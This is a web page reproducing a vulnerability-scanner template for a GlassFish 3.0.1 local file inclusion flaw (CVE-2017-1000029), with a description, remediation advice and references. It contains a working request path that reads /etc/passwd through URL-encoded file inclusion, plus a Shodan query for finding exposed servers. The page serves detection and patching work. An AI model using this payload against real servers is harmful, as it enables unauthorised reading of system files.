CVE-2017-1000029: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion

Description

Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.

PoC

id: CVE-2017-1000029

info:
  name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
  reference:
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-1000029
    cwe-id: CWE-200
    epss-score: 0.08348
    epss-percentile: 0.9466
    cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: glassfish_server
    shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server"
  tags: cve,cve2017,glassfish,oracle,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/resource/file%3a///etc/passwd/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402202db0e80030d852288196e4acf343198bb8cbdf0f817f87d0495837caa08c0b3c022073f0186b91fef08462786b14ecac46dc6c912195712b2ff4f45b38b4531849b1:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities